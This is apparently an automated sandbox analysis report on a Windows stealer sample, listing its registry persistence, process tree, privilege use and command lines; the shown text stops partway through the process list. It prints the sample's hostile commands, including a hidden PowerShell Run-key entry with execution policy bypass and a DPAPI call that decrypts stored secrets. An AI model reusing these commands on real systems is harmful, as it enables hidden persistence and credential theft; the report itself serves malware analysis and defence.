Malware Analysis Report

2024-11-13 14:28

Sample ID 240603-lsnq6sbg54
Target xylex.exe
SHA256 4c5b20b4ca8009ab72a76ed7fa6e09bd1b0b78969980f2b49d9a6641439c8d7e
Tags
execution persistence spyware stealer
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

4c5b20b4ca8009ab72a76ed7fa6e09bd1b0b78969980f2b49d9a6641439c8d7e

Threat Level: Likely malicious

The file xylex.exe was found to be: Likely malicious.

Malicious Activity Summary

execution persistence spyware stealer

Command and Scripting Interpreter: PowerShell

Reads user/profile data of web browsers

Checks computer location settings

Loads dropped DLL

Looks up external IP address via web service

Adds Run key to start application

An obfuscated cmd.exe command-line is typically used to evade detection.

Unsigned PE

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Modifies data under HKEY_USERS

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Detects videocard installed

Enumerates processes with tasklist

Enumerates system info in registry

Modifies registry key

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-03 09:48

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-03 09:47

Reported

2024-06-03 09:57

Platform

win7-20240508-en

Max time kernel

120s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\xylex.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\xylex.exe

"C:\Users\Admin\AppData\Local\Temp\xylex.exe"

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-03 09:47

Reported

2024-06-03 09:57

Platform

win10v2004-20240426-en

Max time kernel

300s

Max time network

304s

Command Line

"C:\Users\Admin\AppData\Local\Temp\xylex.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\xylex.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cscript.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Roaming\\gVudEeAjIOYTLzJ.ps1\"" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\xylex.exe" C:\Windows\system32\reg.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A

An obfuscated cmd.exe command-line is typically used to evade detection.

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133618820258415901" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3396 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 3396 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 1648 wrote to memory of 804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1648 wrote to memory of 804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1648 wrote to memory of 4444 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1648 wrote to memory of 4444 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4444 wrote to memory of 4876 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4444 wrote to memory of 4876 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4876 wrote to memory of 2836 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4876 wrote to memory of 2836 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3396 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 3396 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 3396 wrote to memory of 856 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 3396 wrote to memory of 856 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 1536 wrote to memory of 2524 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1536 wrote to memory of 2524 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 856 wrote to memory of 4484 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 856 wrote to memory of 4484 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3396 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\curl.exe
PID 3396 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\curl.exe
PID 3396 wrote to memory of 508 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 3396 wrote to memory of 508 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 1208 wrote to memory of 4404 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1208 wrote to memory of 4404 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 508 wrote to memory of 1020 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 508 wrote to memory of 1020 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3396 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 3396 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 2216 wrote to memory of 3580 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2216 wrote to memory of 3580 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3396 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 3396 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 3396 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 3396 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 3396 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 3396 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 1712 wrote to memory of 4188 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1712 wrote to memory of 4188 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 5040 wrote to memory of 4920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 5040 wrote to memory of 4920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3396 wrote to memory of 404 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 3396 wrote to memory of 404 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 2740 wrote to memory of 716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2740 wrote to memory of 716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 404 wrote to memory of 2440 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 404 wrote to memory of 2440 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3396 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 3396 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 1884 wrote to memory of 3624 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1884 wrote to memory of 3624 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3396 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 3396 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 3396 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 3396 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 4720 wrote to memory of 2004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cscript.exe
PID 4720 wrote to memory of 2004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cscript.exe
PID 3636 wrote to memory of 4916 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3636 wrote to memory of 4916 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3396 wrote to memory of 3324 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 3396 wrote to memory of 3324 N/A C:\Users\Admin\AppData\Local\Temp\xylex.exe C:\Windows\system32\cmd.exe
PID 3324 wrote to memory of 3480 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WaaSMedicAgent.exe
PID 3324 wrote to memory of 3480 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WaaSMedicAgent.exe
PID 3324 wrote to memory of 4980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 3324 wrote to memory of 4980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\xylex.exe

"C:\Users\Admin\AppData\Local\Temp\xylex.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -noprofile -

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\p22tuu2q\p22tuu2q.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES85E9.tmp" "c:\Users\Admin\AppData\Local\Temp\p22tuu2q\CSCA1265762AF2049E0913954F9F1C15260.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,21,13,251,61,125,41,113,73,181,63,165,1,91,36,248,68,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,52,149,19,144,89,112,59,59,251,229,141,202,64,101,240,104,137,13,3,69,53,156,155,146,175,90,146,162,246,238,201,90,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,8,59,176,18,137,226,140,52,19,171,62,247,31,153,110,138,40,43,108,72,120,10,22,206,204,166,195,251,206,76,84,236,48,0,0,0,182,67,21,24,178,28,183,38,171,5,235,33,128,96,100,191,115,29,3,244,255,89,222,94,221,44,46,134,199,244,235,56,71,157,109,19,168,133,44,36,119,44,14,122,209,122,31,112,64,0,0,0,122,214,19,81,118,163,136,78,57,148,251,210,240,3,134,99,156,175,50,154,230,153,101,220,35,132,92,147,223,230,14,232,202,102,120,97,201,199,70,225,226,97,114,2,149,239,63,52,211,209,152,49,2,92,152,238,148,185,58,73,30,45,12,201), $null, 'CurrentUser')"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

